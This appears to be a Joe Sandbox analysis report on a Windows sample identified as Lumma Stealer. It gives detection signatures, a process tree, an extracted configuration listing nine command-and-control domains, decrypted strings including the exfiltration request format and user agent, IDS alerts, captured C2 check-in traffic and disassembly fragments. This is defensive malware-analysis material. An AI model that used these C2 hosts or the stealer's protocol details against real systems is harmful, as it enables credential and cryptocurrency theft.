Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
3vLKNycnrz.exe

Overview

General Information

Sample name:3vLKNycnrz.exe
renamed because original name is a hash value
Original sample name:78b4d3e1df367155161b0ca24d08b157.exe
Analysis ID:1581190
MD5:78b4d3e1df367155161b0ca24d08b157
SHA1:e0b63eb3c6858c7cb8e3754b67264b8a861b1d86
SHA256:10c9f5d51b36a62a32560a1e9912a28c781f9723fa23c2f778a86e8e94aef2fb
Tags:exeLummaStealeruser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
LummaC encrypted strings found
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the clipboard data
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • 3vLKNycnrz.exe (PID: 7360 cmdline: "C:\Users\user\Desktop\3vLKNycnrz.exe" MD5: 78B4D3E1DF367155161B0CA24D08B157)
    • 3vLKNycnrz.exe (PID: 7452 cmdline: "C:\Users\user\Desktop\3vLKNycnrz.exe" MD5: 78B4D3E1DF367155161B0CA24D08B157)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{
  "C2 url": [
    "sordid-snaked.cyou",
    "effecterectz.xyz",
    "awake-weaves.cyou",
    "debonairnukk.xyz",
    "peelyitemsn.click",
    "immureprech.biz",
    "deafeninggeh.biz",
    "diffuculttan.xyz",
    "wrathful-jammy.cyou"
  ],
  "Build id": "Lb9dkQ--Jora"
}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1430982949.0000000006240000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000000.00000002.1411982462.0000000003461000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          Process Memory Space: 3vLKNycnrz.exe PID: 7360JoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Process Memory Space: 3vLKNycnrz.exe PID: 7360JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
              Click to see the 1 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.3vLKNycnrz.exe.6240000.8.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.3vLKNycnrz.exe.47d16e0.0.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  0.2.3vLKNycnrz.exe.45cf2a0.5.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

                    Sigma Signatures

                    No Sigma rule has matched

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-27T08:13:07.399283+010020283713Unknown Traffic192.168.2.849706104.21.62.151443TCP
                    2024-12-27T08:13:09.017586+010020283713Unknown Traffic192.168.2.849707104.21.62.151443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-27T08:13:08.134997+010020546531A Network Trojan was detected192.168.2.849706104.21.62.151443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-27T08:13:08.134997+010020498361A Network Trojan was detected192.168.2.849706104.21.62.151443TCP

                    Joe Sandbox Signatures

                    • AV Detection
                    • Compliance
                    • Software Vulnerabilities
                    • Networking
                    • Key, Mouse, Clipboard, Microphone and Screen Capturing
                    • System Summary
                    • Data Obfuscation
                    • Hooking and other Techniques for Hiding and Protection
                    • Malware Analysis System Evasion
                    • Anti Debugging
                    • HIPS / PFW / Operating System Protection Evasion
                    • Language, Device and Operating System Detection
                    • Stealing of Sensitive Information
                    • Remote Access Functionality

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 0.2.3vLKNycnrz.exe.4fb8558.6.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["sordid-snaked.cyou", "effecterectz.xyz", "awake-weaves.cyou", "debonairnukk.xyz", "peelyitemsn.click", "immureprech.biz", "deafeninggeh.biz", "diffuculttan.xyz", "wrathful-jammy.cyou"], "Build id": "Lb9dkQ--Jora"}
                    Source: 3vLKNycnrz.exeReversingLabs: Detection: 52%
                    Source: 3vLKNycnrz.exeVirustotal: Detection: 56%Perma Link
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: 3vLKNycnrz.exeJoe Sandbox ML: detected
                    Source: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: sordid-snaked.cyou
                    Source: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: awake-weaves.cyou
                    Source: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: wrathful-jammy.cyou
                    Source: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: debonairnukk.xyz
                    Source: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: diffuculttan.xyz
                    Source: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: effecterectz.xyz
                    Source: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: deafeninggeh.biz
                    Source: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: immureprech.biz
                    Source: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: peelyitemsn.click
                    Source: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                    Source: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                    Source: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                    Source: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                    Source: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                    Source: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Lb9dkQ--Jora
                    Source: 3vLKNycnrz.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.21.62.151:443 -> 192.168.2.8:49706 version: TLS 1.2
                    Source: 3vLKNycnrz.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.0000000004FB8000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431795732.0000000006370000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.0000000004FB8000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431795732.0000000006370000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000048C2000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431335377.00000000062D0000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000048C2000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431335377.00000000062D0000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then movzx ebx, byte ptr [esi+ecx+499B7F50h]2_2_0043A320
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 2DA07A80h2_2_0043CCE0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then mov edx, dword ptr [ebp-1Ch]2_2_0040BD61
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-17h]2_2_00427040
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then movzx eax, byte ptr [edi+ecx]2_2_0040D076
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]2_2_00429820
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then mov edx, eax2_2_004230D0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then mov ecx, eax2_2_004230D0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then mov esi, dword ptr [ebp-00000084h]2_2_004230D0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then mov word ptr [edi], ax2_2_0043A8FB
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then xor eax, eax2_2_0041709A
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then mov ecx, eax2_2_0043D8A0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0041895F
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0041895F
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0041895F
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then mov ecx, eax2_2_00428160
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx-01EDEA17h]2_2_0042A96A
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0042A972
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx-01EDEA17h]2_2_0042A972
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then movzx edx, byte ptr [ebx+eax+2C9B826Eh]2_2_0040D1C7
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then mov ecx, eax2_2_0040D1C7
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then movzx ebp, byte ptr [esp+eax-04h]2_2_0041F990
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then jmp eax2_2_0041CA02
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then jmp eax2_2_0041CA19
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then movzx eax, byte ptr [esp+esi-403FDF06h]2_2_00408230
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+02h]2_2_004212C0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], E785F9BAh2_2_0040E2CF
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+07C7E146h]2_2_004162D6
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then mov word ptr [esi], cx2_2_004142E0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_00432A90
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 71B3F069h2_2_0043CA90
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h2_2_00439340
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+07C7DE9Eh]2_2_00439340
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], A2347758h2_2_00439340
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h2_2_00429360
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], 5E874B5Fh2_2_00438B00
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then push edi2_2_004263C1
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+14h]2_2_0043B3E5
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then mov edx, ecx2_2_004223EF
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then mov edx, eax2_2_00423386
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then mov ecx, eax2_2_00423386
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+07C7DE9Eh]2_2_0040E39C
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then mov edi, dword ptr [esp+44h]2_2_00427C3A
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+20h]2_2_0042843A
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+07C7DE9Eh]2_2_0040E39C
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+526FD95Bh]2_2_00435CA0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], E785F9BAh2_2_0040D555
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then mov edi, ecx2_2_00422D70
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then mov edx, eax2_2_00422D70
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then mov ecx, eax2_2_00422D70
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_00428D00
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then jmp edx2_2_0043BD10
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then jmp eax2_2_0040A539
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then mov ecx, eax2_2_00415538
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then movzx edx, byte ptr [esp+esi-5Eh]2_2_004365C0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then mov edx, eax2_2_0041C5E0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then mov word ptr [edi], ax2_2_0041C5E0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h2_2_00414DB0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then movzx ecx, byte ptr [esp+ebx+06h]2_2_00408E70
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-6592EC84h]2_2_00426608
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], C7235EAFh2_2_0043CE10
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then lea ecx, dword ptr [eax-67528DC7h]2_2_00426E19
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+07C7DEA2h]2_2_00419620
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then mov word ptr [edx], ax2_2_0040C6E5
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+55636BF6h]2_2_0040C6E5
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_00429EF8
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then push edi2_2_0040DE8A
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], E785F9BAh2_2_00438EB0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], E785F9BAh2_2_0040CF45
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then cmp dword ptr [ecx+ebx*8], E785F9BAh2_2_00438F60
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-62h]2_2_00414713
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then mov edi, dword ptr [esp+08h]2_2_00414713
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then mov eax, 00000001h2_2_00414713
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0041B7C6
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then mov esi, edx2_2_0042B7AD
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then mov ecx, eax2_2_0042B7AD
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 705FAB68h2_2_0040D7B4
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then movzx edx, byte ptr [esi+ecx+07C7DE9Eh]2_2_0040D7B4
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], E785F9BAh2_2_0040D7B4

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49706 -> 104.21.62.151:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49706 -> 104.21.62.151:443
                    Source: Malware configuration extractorURLs: sordid-snaked.cyou
                    Source: Malware configuration extractorURLs: effecterectz.xyz
                    Source: Malware configuration extractorURLs: awake-weaves.cyou
                    Source: Malware configuration extractorURLs: debonairnukk.xyz
                    Source: Malware configuration extractorURLs: peelyitemsn.click
                    Source: Malware configuration extractorURLs: immureprech.biz
                    Source: Malware configuration extractorURLs: deafeninggeh.biz
                    Source: Malware configuration extractorURLs: diffuculttan.xyz
                    Source: Malware configuration extractorURLs: wrathful-jammy.cyou
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 104.21.62.151:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 104.21.62.151:443
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: peelyitemsn.click
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficDNS traffic detected: DNS query: peelyitemsn.click
                    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: peelyitemsn.click
                    Source: 3vLKNycnrz.exe, 00000000.00000002.1411982462.0000000003461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000048C2000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431335377.00000000062D0000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000048C2000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431335377.00000000062D0000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000048C2000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431335377.00000000062D0000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: 3vLKNycnrz.exe, 00000002.00000002.1443084110.0000000001437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peelyitemsn.click/
                    Source: 3vLKNycnrz.exe, 00000002.00000002.1443084110.0000000001437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peelyitemsn.click/.
                    Source: 3vLKNycnrz.exe, 00000002.00000002.1443084110.000000000140F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peelyitemsn.click/C
                    Source: 3vLKNycnrz.exe, 00000002.00000002.1443084110.000000000140F000.00000004.00000020.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000002.00000002.1443084110.0000000001437000.00000004.00000020.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000002.00000002.1443006164.00000000013FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peelyitemsn.click/api
                    Source: 3vLKNycnrz.exe, 00000002.00000002.1443084110.000000000140F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peelyitemsn.click/api6
                    Source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000048C2000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431335377.00000000062D0000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000048C2000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431335377.00000000062D0000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1411982462.0000000003461000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000048C2000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431335377.00000000062D0000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                    Source: unknownHTTPS traffic detected: 104.21.62.151:443 -> 192.168.2.8:49706 version: TLS 1.2
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00430740 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,2_2_00430740
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00430740 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,2_2_00430740
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 0_2_03292B30 NtQueryInformationProcess,0_2_03292B30
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 0_2_03292B29 NtQueryInformationProcess,0_2_03292B29
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 0_2_032975F00_2_032975F0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 0_2_03293A280_2_03293A28
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 0_2_0609A6780_2_0609A678
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 0_2_060994300_2_06099430
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 0_2_0609BFDB0_2_0609BFDB
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 0_2_060956590_2_06095659
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 0_2_060956680_2_06095668
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 0_2_0609A66A0_2_0609A66A
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 0_2_060956670_2_06095667
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 0_2_060950810_2_06095081
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 0_2_060950AF0_2_060950AF
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 0_2_060950C00_2_060950C0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 0_2_06095BEA0_2_06095BEA
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 0_2_06095BF80_2_06095BF8
